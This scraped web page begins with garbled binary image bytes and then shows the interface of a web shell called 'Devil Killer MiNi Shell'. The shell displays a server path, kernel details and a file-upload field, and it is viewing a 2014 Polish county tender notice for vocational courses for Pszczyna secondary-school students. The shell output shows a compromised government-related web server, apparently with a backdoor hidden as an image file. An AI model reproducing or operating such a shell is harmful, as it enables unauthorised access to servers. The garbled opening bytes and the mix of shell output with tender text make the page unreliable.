JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140522/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140522/110285-N-2014.html

<p class="kh_header"><b>Pszczyna: Przeprowadzenie kursów dla uczniów szkół ponadgimnazjalnych w Powiecie Pszczyńskim w ramach III edycji projektu Mam zawód - mam pracę w regionie.</b><br>
<b>Numer ogłoszenia: 110285 - 2014; data zamieszczenia: 22.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pszczyński , ul. 3 Maja 10, 43-200 Pszczyna, woj. śląskie, tel. 032 4492300, 032 4492399, faks 032 4492345.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pszczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów dla uczniów szkół ponadgimnazjalnych w Powiecie Pszczyńskim w ramach III edycji projektu Mam zawód - mam pracę w regionie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Przeprowadzenie kursów dla uczniów szkół ponadgimnazjalnych w Powiecie Pszczyńskim w ramach III edycji projektu  Mam zawód - mam pracę w regionie obejmujących następujące kursy:
a.kurs stylizacji paznokci i kurs wizażu,b.kurs kelnerski, kurs  barmański I stopnia, kurs CAFE - BARISTA, kurs carvingu I  stopnia.c.kursy komputerowe tj. kurs tworzenia stron internetowych; kurs grafiki komputerowej; kurs obsługi programu komputerowego AutoCAD podstawy; kurs obsługi programu komputerowego SYMFONIA; kurs obsługi programu komputerowego SUBIEKT GT; kurs obsługi programu komputerowego KSIĘGOWOŚĆ W DZIAŁALNOŚCI GOSPODARCZEJ.
d.Kurs kierowcy operatora wózka jezdniowego w tym bezpieczna wymiana butli, kurs spawania MAG 135, kurs obsługi i programowania obrabiarek CNC.
e.kursu fotografii cyfrowej I stopnia, kursu obsługi kas fiskalnych, kursu języka angielskiego.Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach projektu systemowego pn. Mam zawód - mam pracę w regionie, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach projektu Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013.
2.Ze względu na charakter usługi całość zamówienia podzielono na pięć odrębnych części, dopuszczając możliwość ubiegania się o każdą z części zamówienia z osobna:
CZĘŚĆ 1: -  USŁUGA   PRZEPROWADZENIA  KURSU  STYLIZACJI PAZNOKCI I KURSU WIZAŻU.CZĘŚĆ 2:  USŁUGA   PRZEPROWADZENIA  KURSU  KELNERSKIEGO, KURSU  BARMAŃSKIEGO I STOPNIA,KURSU CAFE BARISTA, KURSU CARVINGU I STOPNIA
CZĘŚĆ 3:   USŁUGA   PRZEPROWADZENIA  KURSÓW KOMPUTEROWYCH
CZĘŚĆ 4:  USŁUGA   PRZEPROWADZENIA  KURSU KIEROWCY OPERATORA WÓZKA JEZDNIOWEGO W TYM BEZPIECZNA WYMIANA BUTLI, KURSU SPAWANIA MAG 135, KURSU OBSŁUGI I PROGRAMOWANIA OBRABIAREK CNC. CZĘŚĆ 5 - USŁUGA PRZEPROWADZENIA KURSU FOTOGRAFII CYFROWEJ I STOPNIA,KURSU OBSŁUGI KAS FISKALNYCH, KURSU JĘZYKA ANGIELSKIEGO. 3.	Przedmiotowe kursy powinny obejmować wiedzę teoretyczną i praktyczną z zakresu danego kursu.
4. Szczegółowy opis poszczególnych części przedmiotu zamówienia 
zawiera załącznik nr 1 do SIWZ Opis przedmiotu zamówienia, odpowiednio dla każdej części zamówienia.5.Pozostałe wymagania, jakie musi spełnić Wykonawca dla zrealizowania przedmiotu umowy:a.	Zamawiający udostępni nieodpłatnie sale szkoleniowe w Powiatowym Zespole Szkół nr 1 i Powiatowym Zespole Szkół nr 2 w Pszczynie. Zajęcia mogą odbywać się od poniedziałku do piątku. 
b.Wykonawca winien zapewnić wyposażenie dydaktyczne dla każdego uczestnika danego kursu  oraz pozostałe wymagania zgodnie z warunkami wynikającymi z załącznika nr 1 do siwz Opis przedmiotu zamówienia oraz z odrębnych przepisów.
c.Wykonawca winien opracować harmonogram przeprowadzenia kursu w oparciu    o ustaloną częstotliwość spotkań z określeniem czasu jego trwania  z uwzględnieniem wszystkich godzin przewidzianych na dany kurs.d.Wykonawca zobowiązany będzie uzgadniać terminy zajęć każdorazowo z uczestnikiem kursu  w godzinach nie kolidujących z zajęciami szkolnymi, uwzględniając fakt, iż uczestnicy projektu niejednokrotnie biorą udział w więcej niż jednym kursie.e.Ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie trwania kursu oraz w drodze na zajęcia i powrotnej z zajęć do miejsca zamieszkania ponosi Zamawiający.f.Dokumentacja szkolenia, zaświadczenia, certyfikaty, materiały szkoleniowe oraz sala dydaktyczna winny być oznakowane przez Wykonawcę poprzez umieszczanie logo typów UE, EFS, POKL i nazwą projektu.Wartość zamówienia nie przekracza kwot określonych w przepisach wydanych na podstawie  art. 11 ust. 8 ustawy Prawo Zamówień Publicznych ustawy z dnia  29 stycznia 2004r. - Prawo Zamówień Publicznych.	Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu  zakupów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art.  22 ust. 1 Ustawy - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art.  22 ust. 1 Ustawy - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art.  22 ust. 1 Ustawy - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art.  22 ust. 1 Ustawy - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art.  22 ust. 1 Ustawy - załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia i dokumenty, których przedłożenia w ofercie żąda Zamawiający: 
wypełniony Formularz ofertowy -  załącznik nr 2 do SIWZ.
Pełnomocnictwo, w przypadku ustanowienia pełnomocnictwa (w formie oryginału lub notarialnie potwierdzonej jego kopii) musi znajdować się w ofercie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w następujących okolicznościach:
a.rezygnacji Zamawiającego z wykonania części usługi z jednoczesnym ograniczeniem (obniżeniem) wynagrodzenia wykonawcy,b.ustawowej zmiany przepisów podatkowych, , np. zmiany stawki podatku VAT c.działania siły wyższej, zdarzeń losowych niezależnych od stron umowy d.	poprawy oczywistej omyłki.
e.zmiany terminu realizacji zamówienia spowodowanej przerwami w realizacji usługi powstałymi z przyczyn nie leżących po stronie Wykonawcy; f.pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;
g.zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych;h.zmiana lub wprowadzenie podwykonawcy, zmiana lub wprowadzenie osoby osób uczestniczących w wykonywaniu zamówienia  (realizujących zamówienie) pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;i.	zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy; j.	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,k.konieczności wprowadzenia zmian będących następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki, l.wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.pszczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pszczynie, parter pok. 5 Wydział Zamówień Publicznych lub przesyłką pocztową na adres: Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Pszczynie, I piętro pok. 35 Sekretariat lub przesyłką pocztową  na adres: Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach projektu pn. Mam zawód - mam pracę w regionie Priorytet IX Rozwój wykształcenia i kompetencji w regionach,  Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1:   USŁUGA   PRZEPROWADZENIA  KURSU  STYLIZACJI PAZNOKCI I KURSU WIZAŻU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.KURS STYLIZACJI PAZNOKCI Maksymalna liczba uczestniczek przedmiotowego kursu: 11 osób. Zajęcia zostaną przeprowadzone w ramach dwóch oddzielnych grup. Kurs skierowany jest dla uczennic/absolwentek szkół ponadgimnazjalnych kształcących się w zawodzie: fryzjer, technik usług fryzjerskich.
Minimalna liczba godzin kursu to minimum 45 godzin (godzina trwać będzie 60 minut).
Wykonawca zobowiązany jest zapewnić: sprzęt i materiały szkoleniowe, zestaw startowy dla uczestniczek (po zakończonym kursie otrzymują zestaw na własność) zawierający co najmniej lampę UV do żeli (posiada min. cztery żarówki UV, wyświetlacz LCD, wbudowany sensor ruchu, wentylator, osłonę chroniącą oczy przed promieniowaniem UV), gilotynę, zestaw żeli, zestaw podstawowy tipsów, płatki kosmetyczne, mały zestaw do zdobienia, blok polerski, pilnik, pędzelek. Cel kursu: nabycie umiejętności pielęgnacji i stylizacji paznokci.B. KURS WIZAŻU: Maksymalna liczba uczestniczek przedmiotowego kursu: 13 osób. Zajęcia odbywać się będą w ramach dwóch oddzielnych grup. Kurs skierowany jest dla uczennic/absolwentek szkół ponadgimnazjalnych kształcących się w zawodzie: fryzjer, technik usług fryzjerskich.Minimalna liczba godzin kursu to minimum 50 godzin (w tym zajęcia teoretyczne 15 godzin (godzina trwać będzie 45 minut); zajęcia praktyczne 35 (godzina trwać będzie 60 minut).Cel kursu: nabycie wiedzy w zakresie aktualnych, profesjonalnych technik wizażu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2:  USŁUGA   PRZEPROWADZENIA  KURSU  KELNERSKIEGO, KURSU  BARMAŃSKIEGO I STOPNIA,KURSU CAFE BARISTA, KURSU CARVINGU I STOPNIA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.KURS  KELNERSKI Maksymalna liczba uczestników kursu wynosić będzie: 15 osób. Kurs odbywać się będzie się  w ramach trzech odrębnych grup. Kurs skierowany jest dla uczniów szkół ponadgimnazjalnych kształcących się w zawodach: technik hotelarstwa, technik kucharz, technik żywienia i usług gastronomicznych, cukiernik, kucharz.Cel kursu: Poznanie podstawowych zasad obsługi konsumenta w zakładzie gastronomicznym.  B.KURS BARMAŃSKI I STOPNIA. Maksymalna liczba uczestników kursu wynosić będzie: 28 osób. Szkolenie odbędzie się w ramach czterech odrębnych grup. Kurs skierowany jest dla uczniów/absolwentów szkół ponadgimnazjalnych kształcących się w zawodach: kucharz, technik hotelarstwa; technik kucharz, technik żywienia i gospodarstwa domowego, technik żywienia i usług gastronomicznych;Minimalna liczba godzin kursu to 40 godzin (zajęcia teoretyczne trwać będą 10 godzin (godzina 45 minut), zajęcia praktyczne trwać będą 30 godzin (godzina zajęć praktycznych trwać będzie 60 minut).Minimalna liczba godzin kursu to 25 godzin (zajęcia teoretyczne trwać będą 5 godzin (godzina wynosić będzie 45 minut); (zajęcia praktyczne trwać będą  20 godzin, godzina wynosić będzie 60 minut).
Cel kursu: zdobycie i opanowanie podstawowej wiedzy i umiejętności potrzebnych do pracy w charakterze barmana.  C.KURS  CAFE - BARISTA Maksymalna liczba uczestników kursu wynosić będzie: 24 osoby. Kurs odbędzie się w czterech odrębnych grupach. Kurs skierowany jest dla uczniów/absolwentów szkół ponadgimnazjalnych kształcących się w zawodach: technik hotelarstwa, technik kucharz, technik żywienia i gospodarstwa domowego, technik żywienia i usług gastronomicznych, cukiernik, kucharz.Cel kursu: zdobycie podstawowych wiadomości teoretycznych na temat kawy oraz praktyczna nauka przygotowania napoju.Minimalna liczba godzin kursu to 14 godzin. Zajęcia teoretyczne trwać będą 4 godziny (godzina 45 minut), zajęcia praktyczne trwać będą 10 godzin (godzina 60 minut). D.KURS CARVINGU  I STOPNIA.Maksymalna liczba uczestników wynosić będzie 10 osób. Szkolenie odbędzie się w ramach dwóch odrębnych grup. Kurs skierowany jest dla uczniów/absolwentów szkół ponadgimnazjalnych kształcących się w zawodach: kucharz, technik hotelarstwa, technik żywienia i usług gastronomicznych, cukiernik.Minimalna liczba godzin kursu wynosić będzie 16 godzin (godzina trwać będzie 60 minut).Cel kursu: nabycie wiedzy teoretycznej i praktycznej z rzeźbienia i tworzenia dekoracji z owoców i warzyw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3:   USŁUGA   PRZEPROWADZENIA  KURSÓW  KOMPUTEROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.KURS TWORZENIA STRON  INTERNETOWYCH Maksymalna liczba uczestników kursu wynosić będzie 17 osób. Kurs przeprowadzony będzie w podziale na dwie grupy. Minimalna liczba godzin kursu wynosić będzie 30 godzin (godzina trwać będzie 45 minut). Wykonawca zapewnia odrębne stanowisko komputerowe dla każdego uczestnika kursu. Cel kursu: zdobycie umiejętności tworzenia stron WWW, poznanie architektury, kompozycji plastycznej i graficznej strony internetowej oraz grafiki użytkowej stron WWW. B. KURS GRAFIKI KOMPUTEROWEJ  Maksymalna liczba uczestników kursu wynosić będzie: 30 osób. Kurs przeprowadzony będzie w podziale na trzy grupy. Minimalna liczba godzin kursu wynosić będzie 60 godzin (godzina trwać będzie 45 minut). Wykonawca zapewnia odrębne stanowisko komputerowe dla każdego uczestnika. Cel kursu: zdobycie podstawowej wiedzy i umiejętności w zakresie obsługi programów graficznych (COREL DRAW, PHOTOSHOP, GIMP) oraz zdobycie wiedzy i umiejętności w zakresie technik transformacji obiektów, zdjęć i rysunków.  C. KURS  OBSŁUGI  PROGRAMU  KOMPUTEROWEGO  AutoCad PODSTAWY. Maksymalna liczba uczestników kursu wynosić będzie: 17 osób. Wykonawca przeprowadzi kurs w podziale na dwie grupy. Minimalna liczba godzin kursu wynosić będzie 40 godzin (godzina trwać będzie 45 minut). Wykonawca zapewnia odrębne stanowisko komputerowe dla każdego uczestnika kursu.Cel kursu: poznanie zasad prawidłowego wykonywania rysunku z wykorzystaniem narzędzi rysunkowych.  D. KURS OBSŁUGI PROGRAMU SYMFONIA Maksymalna liczba uczestników kursu wynosić będzie: 13 osób. Wykonawca przeprowadzi kurs w podziale na dwie grupy. Minimalna liczba godzin kursu to trzy pakiety po 7 godzin. Godzina trwać będzie 45 minut. Wykonawca zapewnia sprzęt i oprogramowanie. E.KURS OBSŁUGI PROGRAMU SUBIEKT GT.Maksymalna liczba uczestników kursu wynosić będzie: 25 osób. Wykonawca przeprowadzi kurs w podziale na trzy grupy. Minimalna liczba godzin kursu wynosić będzie 16 godzin. Godzina trwać będzie: 45 minut.Wykonawca zapewnia odrębne stanowisko komputerowe dla każdego uczestnika kursu.  F.	KURS  OBSŁUGI PROGRAMU Księgowość w działalności gospodarczej.Maksymalna liczba uczestników: 17 osób. Wykonawca przeprowadzi kurs w podziale na dwie grupy. Minimalna liczba godzin kursu wynosić będzie 20 godzin (godzina trwać będzie  45 minut). Wykonawca zapewnia odrębne stanowisko komputerowe dla każdego uczestnika kursu.Cel kursu: zaznajomienie z podstawowym zakresem zagadnień księgowych w prowadzeniu własnej firmy.Kurs skierowany jest do uczniów szkół ponadgimnazjalnych kształcących się w zawodach: technik ekonomista, technik organizacji reklamy, technik geodeta, Technik budownictwa, technik logistyk; technik obsługi turystycznej; sprzedawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
